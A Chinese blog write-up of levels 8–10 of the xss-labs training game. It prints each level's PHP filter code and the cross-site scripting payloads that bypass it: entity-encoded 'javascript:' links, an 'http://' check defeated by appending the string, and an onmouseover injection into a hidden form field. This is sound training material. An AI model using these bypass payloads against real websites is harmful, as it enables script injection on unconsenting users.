xss-labs-游戏闯关8-10

时间：2020-01-20 12:56:10 阅读：135 评论：0 收藏：0 [点我收藏+]

标签：一个引号 action word mic alert play orm err

level8

技术图片

这应该是一个存储型的xss

</center><center><BR><a href="<scr_ipt>alert(‘xss‘)</scr_ipt>">友情链接</a></center><center><img src=level8.jpg></center>

参照level5 level6

先闭合<a>标签，然后采用不含<script>和on关键字的弹窗语句

"> <a hRef="javascript:alert(1)">xss</a>//

失败；

这次应该是转换成小写，然后对所有关键字替换为-，而不是为空；

<?php 
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
$str7=str_replace(‘"‘,‘&quot‘,$str6);
echo ‘<center>
<form action=level8.php method=GET>
<input name=keyword  value="‘.htmlspecialchars($str).‘">
<input type=submit name=submit value=添加友情链接 />
</form>
</center>‘;
?>

在过滤前将keyword转化为小写，并且过滤了script、on、src、data、href、双引号

这次我们就没办法进行重写的办法进行绕过了；

只能通过编码重写的办法进行绕过；

我们不需要闭a标签，只需要把javascript:alert(‘xss‘)加入到href中；

借助hackbar

javascript:alert(‘xss‘)

把script转换为HTML实体

&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#120;&#115;&#115;&#39;&#41;

技术图片

或者只把script的任意一个字母转换为实体即可；

这样就可绕过；

level9

技术图片

<a href="您的链接不合法？有没有！">友情链接</a>

这里加入了对连接是否合法的判断；

<a href="http://www.baidu.com">友情链接</a>

baidu成功；

也就是添加的链接必须含有http://

http://javascrip&#116;:alert(‘xss‘)

<a href="http://javascrip&#116;:alert(‘xss‘)">

虽然添加进去了，但好像没啥用；

后台代码：

<?php 
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
$str7=str_replace(‘"‘,‘&quot‘,$str6);
echo ‘<center>
<form action=level9.php method=GET>
<input name=keyword  value="‘.htmlspecialchars($str).‘">
<input type=submit name=submit value=添加友情链接 />
</form>
</center>‘;
?>
<?php
if(false===strpos($str7,‘http://‘))
{
  echo ‘<center><BR><a href="您的链接不合法？有没有！">友情链接</a></center>‘;
        }
else
{
  echo ‘<center><BR><a href="‘.$str7.‘">友情链接</a></center>‘;
}
?>

strpos() 函数

查找 "php" 在字符串中第一次出现的位置：

===是包括变量值与类型完全相等，而==只是比较两个数的值是否相等。

javascrip&#116;:alert(‘xss‘)http://

可

<a href="javascrip&#116;:alert(‘xss‘)http://">

javascrip&#116;:alert(‘xss‘)；http://

javascrip&#116;:alert(‘xss‘) //http://

技术图片

成功；

level10；

技术图片

<script>alert(‘xss‘)</script>

<h2 align=center>没有找到和&lt;script&gt;alert(‘xss‘)&lt;/script&gt;相关的结果.</h2><center>

被转换为实体类；

考虑转码；

&#60;&#115;&#99;&#114;&#105;&#112;&#116;&#62;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#120;&#115;&#115;&#39;&#41;&#60;&#47;&#115;&#99;&#114;&#105;&#112;&#116;&#62;

没成功；

技术图片

没显示出来；

<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str11 = $_GET["t_sort"];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".‘<center>
<form id=search>
<input name="t_link"  value="‘.‘" type="hidden">
<input name="t_history"  value="‘.‘" type="hidden">
<input name="t_sort"  value="‘.$str33.‘" type="hidden">
</form>
</center>‘;
?>

还过滤了尖括号

</h2><a href="javascript:alert(1)">xss</a>//

。。。

发现还有几个隐藏的参数；

<input name="t_link"  value="" type="hidden">
<input name="t_history"  value="" type="hidden">
<input name="t_sort"  value="" type="hidden">

传入值

<input name="t_link"  value="" type="hidden">
<input name="t_history"  value="" type="hidden">
<input name="t_sort"  value="1" type="hidden">

发现只有t_sort的值发生了改变；

 " onmouseover=alert(‘xss‘)

技术图片

把type=hidden 删掉；

xss-labs-游戏闯关8-10

标签：一个引号 action word mic alert play orm err

原文地址：https://www.cnblogs.com/delongzhang/p/12217399.html

踩

(0)

评论一句话评论（0）

分享档案

更多>

2021年07月29日 (22)
2021年07月28日 (40)
2021年07月27日 (32)
2021年07月26日 (79)
2021年07月23日 (29)
2021年07月22日 (30)
2021年07月21日 (42)
2021年07月20日 (16)
2021年07月19日 (90)
2021年07月16日 (35)

周排行